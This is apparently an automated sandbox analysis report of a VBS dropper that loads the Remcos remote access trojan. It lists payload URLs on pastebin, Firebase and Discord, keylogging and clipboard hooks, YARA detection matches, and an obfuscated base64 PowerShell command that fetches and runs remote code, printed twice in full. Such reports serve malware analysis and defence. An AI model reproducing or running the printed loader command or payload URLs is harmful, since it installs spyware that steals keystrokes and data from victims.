                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0F066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1215337232609714261/1260301846166245438/envi9.7.txt?ex=668ed3
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A101C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A101C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A101C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0EC87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0FF52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0F031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0EFEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0F021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0ECE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2Fp%20mio.txt?alt=media&
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0FF52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Ftest%20babel.txt?alt=
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0FF52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleh9
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0F031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googlehrA
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A1013F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0FAEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000003.00000002.1839358905.0000021A1E910000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A101C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0FFED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0FFED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0EC57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0FEEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0EFDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0FEEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/V9y5Q5vv
                Source: powershell.exe, 00000003.00000002.1823955766.0000021A0EFDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1823955766.0000021A0ECE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sFgsbG3v
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49735 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000004_2_0040A2B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,4_2_0040B70E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_004168C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,4_2_0040B70E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,4_2_0040A3E0

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.powershell.exe.21a1eaef6e0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.powershell.exe.21a1eaef6e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3015953762.0000000002E0F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3014847261.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1839358905.0000021A1EAEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4908, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6736, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041C9E2 SystemParametersInfoW,4_2_0041C9E2

                System Summary

                barindex
                Source: 3.2.powershell.exe.21a0ef5f991.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                Source: 3.2.powershell.exe.21a0ef62350.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 3.2.powershell.exe.21a1eaef6e0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 3.2.powershell.exe.21a1eaef6e0.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 3.2.powershell.exe.21a1eaef6e0.5.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 3.2.powershell.exe.21a1eaef6e0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 3.2.powershell.exe.21a1eaef6e0.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 3.2.powershell.exe.21a1eaef6e0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000003.00000002.1839358905.0000021A1EAEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6740, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 4908, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 4908, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: RegSvcs.exe PID: 6736, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2423
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2423Jump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0 G8 YwBv Gw V B5 H ZQBd Do OgBU Gw cw x DI OwBb EI eQB0 GU WwBd F0 I k Ho Z Bt Hc a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K g Cg TgBl Hc LQBP GI agBl GM d g E4 ZQB0 C4 VwBl GI QwBs Gk ZQBu HQ KQ u EQ bwB3 G4 b Bv GE Z BT HQ cgBp G4 Zw o Cc a B0 HQ c 6 C8 LwBw GE cwB0 GU YgBp G4 LgBj G8 bQ v HI YQB3 C8 Vg 5 Hk NQBR DU dgB2 Cc KQ g Ck I p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J B6 GQ bQB3 Gg KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DM LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc TQBz HE QgBJ GI WQ n Ck LgBJ G4 dgBv Gs ZQ o CQ bgB1 Gw b s C WwBv GI agBl GM d Bb F0 XQ g Cg Jw m DY O w GQ MQ 4 GU N Bm DM YgBm DY N 1 DY Yw x DM NgBh Dk M Bk DM MQ w GQ O 3 DE MgBh Dg NQBj DU O Bh DM OQ 5 DU Zg x GE Z 2 GI OQBj Dk MQ 1 DY Nw w GQ NgBk GE Yg x GE PQBt Gg JgBm Dg MQ 4 GQ O 2 DY PQBz Gk JgBm D MwBk GU O 2 DY PQB4 GU PwB0 Hg d u Dc Lg 5 Gk dgBu GU Lw 4 DM N 1 DQ Mg 2 DY MQ 2 DQ O x D Mw w DY Mg x C8 MQ 2 DI N x Dc OQ w DY Mg z DI Nw z DM NQ x DI MQ v HM d Bu GU bQBo GM YQB0 HQ YQ v G0 bwBj C4 c Bw GE Z By G8 YwBz Gk Z u G4 Z Bj C8 Lw 6 HM c B0 HQ a n C L g CQ bQBo HM ZgBv C L g Cc XwBf F8 XwBf GQ ZwBm F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 Jw s C J Bs H cgBr Gw L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\envifa.vbs');powershell -command $KByHL;
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J Bs H cgBr Gw I 9 C Jw w Cc Ow k G0 a Bz GY bw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb FM eQBz HQ ZQBt C4 TgBl HQ LgBT GU cgB2 Gk YwBl F bwBp G4 d BN GE bgBh Gc ZQBy F0 Og 6 FM ZQBy HY ZQBy EM ZQBy HQ aQBm Gk YwBh HQ ZQBW GE b Bp GQ YQB0 Gk bwBu EM YQBs Gw YgBh GM aw g D0 I B7 CQ d By HU ZQB9 Ds WwBT Hk cwB0 GU bQ u E4 ZQB0 C4 UwBl HI dgBp GM ZQBQ G8 aQBu HQ TQBh G4 YQBn GU cgBd Do OgBT GU YwB1 HI aQB0 Hk U By G8 d Bv GM bwBs C PQ g Fs UwB5 HM d Bl G0 LgBO GU d u FM ZQBj HU cgBp HQ eQBQ HI bwB0 G8 YwBv Gw V B5 H ZQBd Do OgBU Gw cw x DI OwBb EI eQB0 GU WwBd F0 I k Ho Z Bt Hc a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K g Cg TgBl Hc LQBP GI agBl GM d g E4 ZQB0 C4 VwBl GI QwBs Gk ZQBu HQ KQ u EQ bwB3 G4 b Bv GE Z BT HQ cgBp G4 Zw o Cc a B0 HQ c 6 C8 LwBw GE cwB0 GU YgBp G4 LgBj G8 bQ v HI YQB3 C8 Vg 5 Hk NQBR DU dgB2 Cc KQ g Ck I p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J B6 GQ bQB3 Gg KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DM LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc TQBz HE QgBJ GI WQ n Ck LgBJ G4 dgBv Gs ZQ o CQ bgB1 Gw b s C WwBv GI agBl GM d Bb F0 XQ g Cg Jw m DY O w GQ MQ 4 GU N Bm DM YgBm DY N 1 DY Yw x DM NgBh Dk M Bk DM MQ w GQ O 3 DE MgBh Dg NQBj DU O Bh DM OQ 5 DU Zg x GE Z 2 GI OQBj Dk MQ 1 DY Nw w GQ NgBk GE Yg x GE PQBt Gg JgBm Dg MQ 4 GQ O 2 DY PQBz Gk JgBm D MwBk GU O 2 DY PQB4 GU PwB0 Hg d u Dc Lg 5 Gk dgBu GU Lw 4 DM N 1 DQ Mg 2 DY MQ 2 DQ O x D Mw w DY Mg x C8 MQ 2 DI N x Dc OQ w DY Mg z DI Nw z DM NQ x DI MQ v HM d Bu GU bQBo GM YQB0 HQ YQ v G0 bwBj C4 c Bw GE Z By G8 YwBz Gk Z u G4 Z Bj C8 Lw 6 HM c B0 HQ a n C L g CQ bQBo HM ZgBv C L g Cc XwBf F8 XwBf GQ ZwBm F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 Jw s C J Bs H cgBr Gw L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\envifa.vbs');powershell -command $KByHL;Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B8798D8 NtQueryInformationProcess,3_2_00007FFD9B8798D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,4_2_004167B4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B9414253_2_00007FFD9B941425
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043E0CC4_2_0043E0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041F0FA4_2_0041F0FA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004541594_2_00454159
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004381684_2_00438168
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004461F04_2_004461F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043E2FB4_2_0043E2FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0045332B4_2_0045332B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042739D4_2_0042739D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004374E64_2_004374E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043E5584_2_0043E558
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004387704_2_00438770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004378FE4_2_004378FE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004339464_2_00433946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0044D9C94_2_0044D9C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00427A464_2_00427A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041DB624_2_0041DB62
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00427BAF4_2_00427BAF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00437D334_2_00437D33
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00435E5E4_2_00435E5E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00426E0E4_2_00426E0E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043DE9D4_2_0043DE9D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00413FCA4_2_00413FCA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00436FEA4_2_00436FEA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00434E10 appears 54 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00402093 appears 50 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00434770 appears 41 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00401E65 appears 34 times
                Source: envifa.vbsInitial sample: Strings found which are bigger than 50
                Source: 3.2.powershell.exe.21a0ef5f991.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                Source: 3.2.powershell.exe.21a0ef62350.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 3.2.powershell.exe.21a1eaef6e0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 3.2.powershell.exe.21a1eaef6e0.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 3.2.powershell.exe.21a1eaef6e0.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 3.2.powershell.exe.21a1eaef6e0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 3.2.powershell.exe.21a1eaef6e0.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 3.2.powershell.exe.21a1eaef6e0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000003.00000002.1839358905.0000021A1EAEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
